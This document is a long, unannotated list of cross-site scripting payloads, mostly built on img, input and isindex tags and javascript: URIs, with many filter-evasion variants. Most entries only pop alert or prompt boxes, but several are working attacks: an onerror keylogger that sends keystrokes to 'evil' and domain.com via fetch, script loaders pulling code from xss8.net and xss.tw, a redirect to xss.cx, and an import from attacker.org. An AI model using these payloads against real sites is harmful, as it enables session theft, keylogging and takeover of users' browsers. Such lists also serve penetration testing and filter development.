- <img src=”http://www.baidu.com/img/bdlogo.gif”;>
- <IMG SRC=java..?..XSS')>
- <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
- <IMG src=javascript:alert('XSS')>
- <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
- <IMG SRC=javascript:alert('XSS')>
- <img src=”x:%90" title=”onerror=alert(1)//”>
- <img src=x[9,10,12,13,32]onerror=”alert(1)”>
- <img src=x:alert(alt) onerror=eval(src) alt=0>
- <img src=x:alert(alt) onerror=eval(src) alt=xss>
- <img src=”x:alert” onerror=”eval(src%2b’(0)’)”>
- <img src=”x:alert” onerror=”eval(src%2b’(1)’)”>
- <img/src=x alt=confirm(1) onmouseover=eval(alt)>
- <img src=”x” alt=”’’onmouseover=alert(1)”>
- <img src=”x:gif” onerror=”alert(0)”>
- <img src=”x:gif” onerror=”eval(‘al’%2b’ert(/renwax23/)’)”>
- <img src=”x:gif” onerror=”eval(‘al’%2b’lert(0)’)”>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’]
- <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’] (/’renwax23'/)”></img>
- <img/src=”x”/id=”javascript”/name=”:confirm”/alt=”(1)”/onerror=”eval(id + name + alt)”>
- <img src=”x:kcf” onerror=”alert(1)”>
- <IMG SRC=x onabort=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onbeforeprint=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onbeforeunload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onblur=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncanplay=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncanplaythrough=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onchange=”alert(String.fromCharCode(88,83,83))”>
- <img src=x on*chr*Error=”javascript:log(*num*)”/>
- <IMG SRC=x onclick=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncontextmenu=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncopy=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncuechange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncut=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondblclick=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondrag=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragend=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragenter=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragleave=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragover=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragstart=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondrop=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondurationchange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onemptied=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onended=”alert(String.fromCharCode(88,83,83))”>
- <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
- <img src=x onerror=”javascript:alert('XSS')">
- <img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'>
- <IMG SRC=”/x” onerror=”  javascript:alert(‘XSS’);”>
- >’>”><img src=x onerror=alert(0)>
- “><img src=x onerror=alert(0)>
- <img src=x onerror=”alert(1)”
- <img/src==”x onerror=alert(1)//”>
- <img src=x onerror=alert(123) />
- />.<<img src=x onerror=alert(1)//>><>&page=1
- <img/src=’x’onerror=alert(1)>//INJECTX
- <img src=x onerror=alert(24)> 29
- “><img src=x onerror=’alert(document.domain)’>
- <img src=x onerror=alert(/insight-labs/)>B<p
- <img src=x onerror=alert(String.fromCharCode(88,83,83));>
- “><img src=x onerror=alert(String.fromCharCode(88,83,83));>
- <IMG SRC=x onerror=”alert(String.fromCharCode(88,83,83))”>
- <img src=x onerror=alert(‘XSS’);>
- “><img src=x onerror=alert(‘XSS’);>
- “><img src=x onerror=’alert(xzz)’>
- <img src=x onerror=appendChild(createElement(‘script’)).src=’//jsa}’ />
- <img/src=”x”/onerror=”[boom]”>
- ><img src=\”x\” onerror=\”confirm(0)\”/>
- “\”><img src=\”x\” onerror=\”confirm(0)\”/>”,
- “><img src=x onerror=confirm(1); …
- @”><img src=x/onerror=confirm(1)>xss
- <img src=x onerror=’confirm(domain+/ — /+cookie)’>”>
- ><imgsrc=x onerror=confirm.onerror=confirm(1)>
- “\”><imgsrc=x onerror=confirm.onerror=confirm(1)>”,
- “><img src=x onerror=confirm(‘x’) />]
- “><img src=x onerror=confirm`/XSS/`>//
- “><img src=x onerror=co\u006efir\u006d`1`>
- <img src=x onerror=document.body.appendChild(document.createElement(‘script’)).src=’domain.js’>
- <img src=x onerror=”document.location=’http://xss.cx’”;>
- <img src=x onerror=’document.onkeypress=function(e){fetch(“//evil?k=”+String.fromCharCode(e.which))},this.remove();’>
- <img src=x onerror=’document.onkeypress=function(e){fetch(“http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
- <img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
- <img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement(“script”)).src=”http://xss.tw/3381"))>
- <IMG SRC=”/x” onerror=”jav%00ascript:alert(‘XSS’);”>
- “><img src=x onerror=javascript:alert(`1`)>
- “><img src=x onerror=javascript:alert(‘1’)>
- “><img src=x onerror=javascript:alert(“1”)>
- “><img src=x onerror=javascript:alert((`1`))>
- “><img src=x onerror=javascript:alert((‘1’))>
- “><img src=x onerror=javascript:alert((“1”))>
- “><img src=x onerror=javascript:alert(1)>
- “><img src=x onerror=javascript:alert(`A`)>
- “><img src=x onerror=javascript:alert(‘A’)>
- “><img src=x onerror=javascript:alert(“A”)>
- “><img src=x onerror=javascript:alert((`A`))>
- “><img src=x onerror=javascript:alert((‘A’))>
- “><img src=x onerror=javascript:alert((“A”))>
- “><img src=x onerror=javascript:alert((A))>
- “><img src=x onerror=javascript:alert(A)>
- ><IMG SRC=x onerror=javascript:alert("Xss-By-Muhaddi")>
- ><IMG SRC=x onerror=javascript:alert("Xss")>
- ��><IMG SRC=x onerror=javascript:alert("Xss")>
- <IMG SRC=”/x” onerror=”jav ascript:alert(‘XSS’);”>
- <img src=x onerror=”javascript:window.onerror=alert;throw 1">
- <Img src = x onerror = “javascript: window.onerror = alert; throw 1”>
- <Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>
- <IMG SRC=”/x” onerror=”jav
ascript:alert(‘XSS’);”>
- <img/src=”x”/onerror=”[JS-F**K Payload]”>
- ><imgsrc=x onerror=prompt(0);>
- “><img src=x onerror=prompt(0)>
- <img src=x onerror=prompt(1);>
- <img src=x onerror=prompt`1`>
- <img src=x onerror=prompt(1);>
- “><img src=x onerror=prompt(1)>
- “><img src=x onerror=prompt(1);>
- #><img src=x onerror=prompt(1)>
- #��><img src=x onerror=prompt(1)>
- <img src=x onerror=prompt(1)>//INJECTX
- <img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
- “><img src=x onerror=prompt(document.location);>#”><img src=x onerror=prompt(document.location);>
- ‘ “/><img src= x onerror=prompt(/xss/)>
- “><img src=x onerror=prompt(/xss by me/)>
- “><img src=x onerror=prompt(“xss”);>#”><img src=x onerror=prompt(“xss”);>
- <img src=x onerror=URL=’javascript:confirm(1)’>
- <img src=x onerror=window.open(‘data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’);>
- <img src=x onerror=window.open(‘http://google.com');>
- “><img src=x onerror=window.open(‘https://www.google.com/');>
- “><img src=x onerror=window.open(‘https://www.google.com/');>
- <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’”></img>
- <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’” width=”0" height=”0"></img><img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img>
- <img src=x onerror=\x00"javascript:alert(1)”>
- <img src=x onerror=\x09"javascript:alert(1)”>
- <img src=x onerror=\x10"javascript:alert(1)”>
- <img src=x onerror=\x11"javascript:alert(1)”>
- <img src=x onerror=\x12"javascript:alert(1)”>
- <img src=x onerror=\x32"javascript:alert(1)”>
- ><IMG SRC=x onerror=javascript:alert('XSS')>
- ��><IMG SRC=x onerror=javascript:alert('XSS')>
- <img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
- ><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
- “<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”
- “\”><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”,
- <img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
- “<img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>”
- “/><img src=x onerror=x.onerror=prompt(0)>
- “\”/><img src=x onerror=x.onerror=prompt(0)>”
- “/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>
- “\”/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>”
- <IMG SRC=x onhashchange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oninput=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oninvalid=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeydown=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeypress=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeyup=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onloadeddata=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onloadedmetadata=”alert(String.fromCharCode(88,83,83))”>
- <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
- <IMG SRC=x onloadstart=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmessage=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousedown=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousemove=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseout=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseover=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseup=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousewheel=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onoffline=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ononline=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpagehide=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpageshow=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpaste=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpause=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onplay=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onplaying=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpopstate=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onprogress=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onratechange=”alert(String.fromCharCode(88,83,83))”>
- <img src=`x` onrerror= ` ;; alert(1) ` />
- <IMG SRC=x onreset=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onresize=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onscroll=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsearch=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onseeked=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onseeking=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onselect=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onshow=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onstalled=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onstorage=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsubmit=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsuspend=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ontimeupdate=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ontoggle=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onunload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onvolumechange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onwaiting=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onwheel=”alert(String.fromCharCode(88,83,83))”>
- <img src=”x:o” title=”onerror=alert(1)//”>
- <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
- <img src=”x` `<script>alert(1)</script>”` `>
- <img src=”x` `<script>javascript:alert(1)</script>”` `>
- <img src=xss onerror=alert(1)>
- <img/src=”xss.png”alt=”xss”>
- <img src=”x:? title=” onerror=alert(1)//”>
- <img src=x\x09onerror=”javascript:alert(1)”>
- <img src=x\x10onerror=”javascript:alert(1)”>
- <img src=x\x11onerror=”javascript:alert(1)”>
- <img src=x\x12onerror=”javascript:alert(1)”>
- <img src=x\x13onerror=”javascript:alert(1)”>
- <img src=”xx# onerror=alert(1)//{0xf09d8c86}”>
- <![<img src=x:x onerror=`alert(/ @jackmasa /)//`] →
- “><img src=”x:x” onerror=”alert(XSS)”>
- ‘><img/src=”x:x”/onerror=”confirm(1)”’><
- <![<img src=x:x onerror=`confirm(2)//`] →
- <img src=xx: onerror=confirm(document.location)>
- <img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
- “><img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
- <! — `<img/src=xx:xx onerror=alert(1)// — !>
- <img src=`xx:xx`onerror=alert(1)>
- <img src=`xx:xx`onerror=confirm(1)>
- <img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
- ><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
- “<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”
- “\”><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”,
- →<! — — -> <img src=xxx:x onerror=javascript:alert(1)> →
- <img src=xx:xx onerror=window[[‘logChr*chr*’]](*num*)>
- `”’><img src=xxx:x onerror\x00=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x09=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0A=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0B=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0C=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0D=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x20=javascript:alert(1)>
- `”’><img src=xxx:x \x00onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x09onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Aonerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Bonerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Conerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Donerror=javascript:alert(1)>
- `”’><img src=xxx:x \x20onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x22onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x27onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x2Fonerror=javascript:alert(1)>
- <IMG STYLE=’
- <IMG STYLE_NeatHtmlReplace=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <img style=”xss:expression(alert(0))”>
- <Img style = “xss: expression (alert (0))”>
- <IMG STYLE=’xss:expre\ssion(alert(“X5SS”))’>
- <IMG STYLE=”xss: expre\ssion(alert(“XSS”))”>
- <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- <;IMG STYLE=”;xss:expr/*XSS*/ession(alert(‘;XSS’;))”;>;
- <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”
- <IMG STYLE=”xss:expr/*XSS*ession(alert(‘XSS’))”>
- <IMG STYLE=”xss:expr/*XSS*/ession(confirm(document.location))”>
- <img STYLE=”xss:expr/*XSS*/ession(document.vulnerable=true)”>
- <IMG STYLE=”xss:expr/*XSS*/ession(javascript:alert(1))”>
- <img =”=” title=”><img src=1 onerror=alert(1)>”
- <img \x00src=x onerror=”alert(1)”>
- <img \x00src=x onerror=”javascript:alert(1)”>
- <img\x0bsrc=’1'\x0bonerror=alert(0)>
- <;IMG
SRC
=
”;
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

’;
X
S
S
’;
)
”;
>;
- <img\x10src=x onerror=”javascript:alert(1)”>
- <img \x11src=x onerror=”javascript:alert(1)”>
- <img\x11src=x onerror=”javascript:alert(1)”>
- <img \x12src=x onerror=”javascript:alert(1)”>
- <img\x13src=x onerror=”javascript:alert(1)”>
- <img\x32src=x onerror=”javascript:alert(1)”>
- <img \x34src=x onerror=”javascript:alert(1)”>
- <img \x39src=x onerror=”javascript:alert(1)”>
- <img \x47src=x onerror=”javascript:alert(1)”>
- <img\x47src=x onerror=”javascript:alert(1)”>
- <img x/src=x /onerror=”x-\u0063onfirm(1)”>
- import(‘da\r\nta:text/\ecmascript\,alert%601%60’)
- import(‘data:text/javascript,alert(1)’)
- <?import namespace=”t” implementation=”#default#time2">
- <?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML>
- <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc">
- <?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc">
- @import url(http://attacker.org/malicious.css)
- ‘/(@import)/Usi’,
- ?injection=<script+&injection=>alert(1)></script>
- Injection with GIF File as Source of Script (CSP Bypass)
- innerHTML=document.title
- innerHTML=innerText
- innerHTML=location.hash>#<script>alert(1)</script>
- /><input>
- input1=<script/&in%u2119ut1=>al%u0117rt(‘1’)</script>
- <input autofocus onblur=alert(1)>
- <input autofocus onblur=alert(103)>
- <input/autofocus/onfocus=
- <input autofocus onfocus=alert(1)>
- <input autofocus onfocus=alert(1)>//INJECTX
- <input autofocus onfocus=confirm(1)>
- <input/autofocus/onfocus=setTimeout(URL.slice(-7))//#alert()
- <input formaction=JaVaScript:confirm(document.cookie)>
- Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
- <input id=11 name=s value=`aa`onclick=alert(/xss/)>
- <input id=x><input id=x><script>confirm(x)</script>
- <input id=XSS onblur=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
- <input id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
- <input name=password value=logic>
- <input name=USERNAME_PARAMETER_NAME value=USERNAME>
- <input name=username value=brute>
- <input onblur=alert(34) autofocus><input autofocus>
- <input onblur=javascript:alert(1) autofocus><input autofocus>
- <input onblur=write(XSS) autofocus><input autofocus>
- <input onclick=popup=1; >
- <input onfocus=alert(1337) </autofocus>
- <input onfocus=”alert(1)” autofocus>
- <input onfocus=alert(33) autofocus>
- <><input onfocus=confirm(0) autofocus <! —
- <input onfocus=javascript:alert(1) autofocus>
- <input onfocus=popup=1; autofocus=”x”>
- <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa
- <input onfocus=write(1) autofocus>
- <input onfocus=write(XSS) autofocus>
- <input/onmouseover=”javaSCRIPT:confirm(1)”
- <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
- <INPUT SRC=”javascript:alert(‘XSS’);”>
- <input srcset=x href=x onclick=popup=1; >
- <input style=”behavior: url(xss.txt)”>
- </input/><svg><script>alert(1)//
- </input/”><svg><script>alert(1)//
- <INPUT TYPE=”BUTTON” action=”alert(‘XSS’)”/>
- <INPUT+TYPE=”checkbox”+onDblClick=confirm(XSS)>
- <input type=hidden name=comment>click me!</form>
- <input type=hidden onformchange=confirm(1)/>
- <input type=hidden style=`x:expression(confirm(1))`>
- <input type=hidden style=`x:expression(confirm(4))`>
- <input type=”image” dynid=XSS SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”image” DYNSRC=”javascript:alert(‘XSS’);”>
- <input type=”image” dynsrc=”javascript:document.vulnerable=true;”>
- <input type=”image” formaction=JaVaScript:alert(0)>
- <Input type = “image” formaction = JaVaScript: alert (0)>
- <INPUT TYPE=”IMAGE” id=XSS SRC=”javascript:alert(‘XSS’);”>
- <INPUT+TYPE=”IMAGE”+SRC=”javascript:alert(1);”>
- <;INPUT TYPE=”;IMAGE”; SRC=”;javascript:alert(‘;XSS’;);”;>;
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(XSS);”>
- <INPUT TYPE=IMAGE SRC=javascript:alert(XSS);>
- <INPUT TYPE=”IMAGE” SRC=”javascript:confirm(document.location);”>
- <input TYPE=”IMAGE” SRC=”javascript:document.vulnerable=true;”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:javascript:alert(1);”>
- <input/type=”image”/value=””`<span/onmouseover=’confirm(1)’>X`</span>
- <input type=”search” onsearch=”aler\u0074(1)”>
- <input type=”text” name=”a”
- <input type=”text” name=”foo” value=””autofocus/onfocus=alert(1)//”>
- <input type=”text” name=”text”> <input type=”submit” onclick=”waf”>
- <input type=”text” value=``<div/onmouseover=’alert(1)’>X</div>
- <input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div>
- <input type=”text” value=``<div/onmouseover=’confirm(1)’>X</div>
- <input type=”text” value=`` <div/onmouseover=’confirm(1)’>X</div>
- <input type=’text’ value=’jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’></input>
- <input type=”text” value=”jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></input>
- <input type=text value=jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
- <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`”/>
- <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`”/>
- <input type=”text” value=””onfocus=location=’javascript:alert`1`’ autofocus””/>
- <input type=”text” value=””onresize=pompt(1) “>
- <input type=”text” value=””onresize=pompt(1) “> // IE 10 docmode
- <input type=”text” value=””><script>alert(1)//”><script type=”text/javascript”> function x(){ do something }</script>
- <input value:aa/onclick=alert(/xss/)>
- <input value=”${alert(1)}`</script/”>
- <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
- <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
- <! — — !><input value=” →<body/onload=`confirm(4)//`”>
- <input value=<><iframe/src=javascript:confirm(1)
- “><input value=<><iframe/src=javascript:confirm(1)
- <input value=”INPUT”>
- <input value=INPUT>
- <input value=””onfocus=alert(9)//”>
- <input value=’’onfocus=alert(9);a=’’>
- <input value=”<script>alert(1)</script>” `/>
- <input value=”><script src=data:%26comma;alert(1)-”>
- <input value=””><script src=data:%26comma;alert(1)-””>
- <input value=”XSStest” type=text>
- <Input value = “XSS” type = text>
- <i onclick=alert(1)>Click here</i>
- <i/onclick=URL=name>
- io.swf?yid=\”));}catch(e){alert(1);}//
- (?i)([\s\”’`;\/0–9\=]+on\w+\s*=)
- i><<script>alert(document.cookie);//<</script>
- i><ScRiPt>alert(document.cookie)</script>
- i.setAttribute(name, follow);
- i.setAttribute(type, hidden);
- ( is html encoded to (
- ) is html encoded to )
- i><si%2bicript>alert(document.cookie)</script>
- <isindex action=data:text/html, type=image>
- <isindex action=javascript:alert(166) type=submit value=click>
- <isindex action=”javascript:alert(1)” type=image>
- <isindex action=javascript:alert(1) type=image>
- <isindex action=”javascript:alert(1)” type=image> // Firefox, IE
- <isindex action=javascript:alert(1) type=submit value=click> *
- <isindex action=javascript:alert(1) type=submit value=click>
- <isindex action=javascript:alert(1) type=submit value=click>
- <isindex action=javascript:alert(32) type=image>
- <isindex action=”javas&tab;cript:alert(1)” type=image>
- <isindex action=”javas	cript:alert(1)” type=image>
- <isindex action=”javas	cript:confirm(1)” type=image>
- “><isindex action=”javas	cript:confirm(1)” type=image>
- “/><isindex action=”javas	cript:confirm(1)” type=image>
- <isindex action=”javas	cript:confirm(document.cookie)” type=image>
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image> Google Chrome, IE
- <isindex/**/alt=1+src=renwa:window[‘alert’]/**/(alt)+type=image+onerror=while(true){eval(src)}>
- <isindex/autofocus/onfocus=alert()>
- <isindex formaction=javascript:alert(171) type=submit value=click>
- <isindexformaction=”javascript:alert(1)” type=image>
- <isindexformaction=”javascript:alert(1)” type=image>
- <Isindexformaction = “javascript: alert (1)” type = image>
- <isindex formaction=javascript:alert(1) type=submit value=click> *
- <isindex formaction=javascript:alert(1) type=submit value=click>
- <isindex formaction=javascript:alert(1) type=submit value=click>
- <isindex formaction=javascript:confirm(1)>
- <isindex type=image src=1 onerror=alert(1)>
- <isindex+type=image+src=1+onerror=alert(1)>
- <isindex type=image src=1 onerror=alert(31)>
- <isindex type=image src=1 onerror=alert(XSS)>
- <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”>
- <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”> // Firefox, IE
- <isindex x=”javascript:” onmouseover=”alert(XSS)”>
- i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\’a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\’\s\rc\=\’eeeeeee\’\20\>{
- <i style=x:expression(alert(URL=1))>
- <i/style=x=x/**/(confirm(1))(‘\’)expression\’)>
- <i/style=x=x/**/n(confirm(1))(‘\’)expressio\’)>
- <i\x00mg src=’1' onerror=alert(0) />
- <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
- <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
- */<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
- <j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
- */<j-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j”-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j”-alert(9)<! — onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
- javascript:name
- java%09script:alert(1)
- java%0ascript:alert(1)
- java%0dscript:alert(1)
- Javas%26%2399;ript:alert(1)
- javascript:alert(1)
- Javascript:alert(1)
- javascr%0d%0aipt%3Aalert.call(this,%20document.domain)
- javascript:/* —
- javascript:([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- javascript & # 00058; alert (1)
- javascript:confirm(1)
